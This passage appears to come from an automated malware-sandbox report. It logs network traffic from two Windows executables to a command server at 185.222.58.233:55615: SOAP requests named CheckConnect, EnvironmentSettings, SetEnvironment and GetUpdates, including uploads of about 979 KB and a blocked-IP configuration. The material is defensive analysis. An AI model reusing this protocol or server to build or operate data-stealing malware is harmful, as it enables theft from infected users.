                      Sep 8, 2024 13:34:28.026745081 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026751995 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026760101 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026776075 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026783943 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026835918 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026844025 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026851892 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026868105 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026875973 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026884079 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026892900 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026912928 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026921034 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026942015 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026948929 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026974916 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.026983976 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027012110 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027021885 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027030945 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027086020 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027093887 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027102947 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027141094 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027148962 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027157068 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027167082 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027182102 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027189970 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027204990 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027286053 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027293921 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027304888 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027313948 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027322054 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027335882 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027343988 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027353048 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027360916 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027369976 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027395964 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027404070 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027477026 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027484894 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027493000 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027502060 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027509928 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027518034 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027527094 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027581930 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027590990 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027601957 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027611971 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027621031 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027631044 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027637959 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027647018 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027656078 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027664900 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027679920 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027688026 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027726889 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027734995 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027743101 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027750969 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027760029 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027767897 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027776957 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027785063 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027842045 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027849913 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027858019 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027865887 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027874947 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027884007 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027892113 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027900934 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027910948 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027919054 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027965069 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027972937 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027981043 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027990103 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.027998924 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028007030 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028014898 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028023958 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028033972 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028040886 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028089046 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028096914 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028105021 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028114080 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028121948 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028130054 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028137922 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028146982 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028178930 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028187037 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028194904 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028211117 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028218031 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028227091 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028242111 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028249979 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028331995 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028340101 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028372049 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028381109 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028409004 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028419018 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028489113 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028496981 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028506041 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028521061 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028528929 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028541088 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028548956 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028584957 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028593063 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028603077 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028620005 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028628111 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028635979 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028644085 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028709888 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028717995 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028726101 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028734922 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028743029 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028752089 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028762102 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028769970 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028836966 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028845072 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028851986 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028862000 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028870106 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028878927 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028887033 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028894901 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028974056 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.028981924 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:28.069456100 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:29.045892000 CEST5561549719185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:29.059356928 CEST4971855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:29.059999943 CEST4971955615192.168.2.5185.222.58.233

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 8, 2024 13:34:13.311412096 CEST5841153192.168.2.51.1.1.1

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 8, 2024 13:34:13.311412096 CEST192.168.2.51.1.1.10x67bcStandard query (0)api.ip.sbA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 8, 2024 13:34:13.318397045 CEST1.1.1.1192.168.2.50x67bcNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 185.222.58.233:55615

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549706185.222.58.233556153524C:\Users\user\Desktop\l2rMtmFkD6.exe
                      TimestampBytes transferredDirectionData
                      Sep 8, 2024 13:34:07.073009014 CEST241OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.58.233:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Sep 8, 2024 13:34:07.625643969 CEST25INHTTP/1.1 100 Continue
                      Sep 8, 2024 13:34:07.752206087 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:07 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Sep 8, 2024 13:34:12.810308933 CEST224OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.58.233:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Sep 8, 2024 13:34:12.980317116 CEST25INHTTP/1.1 100 Continue
                      Sep 8, 2024 13:34:13.182468891 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6725
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:13 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>185.222.58.233</b:string><b:string>14.221.119.206</b:string><b:string>218.65.17.113</b:string><b:string>117.63.234.176</b:string><b:string>110.246.230.68</b:string><b:string>103.40.79.21</b:string><b:string>123.132.1.183</b:string><b:string>171.11.3.221</b:string><b:string>43.159.244.65</b:string><b:string>117.24.105.210</b:string><b:string>40.122.25.223</b:string><b:string>113.103.89.0</b:string><b:string>36.99.136.137</b:string><b:string>139.186.206.86</b:string><b:string>220.191.227.6</b:string><b:string>47.57.237.64</b:string><b:string>94.134.183.13</b:string><b:string>59.42.145.234</b:st [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549708185.222.58.233556153524C:\Users\user\Desktop\l2rMtmFkD6.exe
                      TimestampBytes transferredDirectionData
                      Sep 8, 2024 13:34:16.092364073 CEST222OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.58.233:55615
                      Content-Length: 978961
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Sep 8, 2024 13:34:17.583553076 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:17 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Sep 8, 2024 13:34:17.586405993 CEST218OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.58.233:55615
                      Content-Length: 978953
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Sep 8, 2024 13:34:17.755081892 CEST25INHTTP/1.1 100 Continue
                      Sep 8, 2024 13:34:18.324399948 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:18 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549709185.222.58.233556153920C:\Users\user\AppData\Roaming\ECcZgk.exe
                      TimestampBytes transferredDirectionData
                      Sep 8, 2024 13:34:16.585912943 CEST241OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.58.233:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Sep 8, 2024 13:34:17.165157080 CEST25INHTTP/1.1 100 Continue
                      Sep 8, 2024 13:34:17.418775082 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:17 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Sep 8, 2024 13:34:17.418787956 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:17 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Sep 8, 2024 13:34:22.478548050 CEST224OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.58.233:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Sep 8, 2024 13:34:22.649198055 CEST25INHTTP/1.1 100 Continue
                      Sep 8, 2024 13:34:22.843609095 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6725
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sun, 08 Sep 2024 11:34:22 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
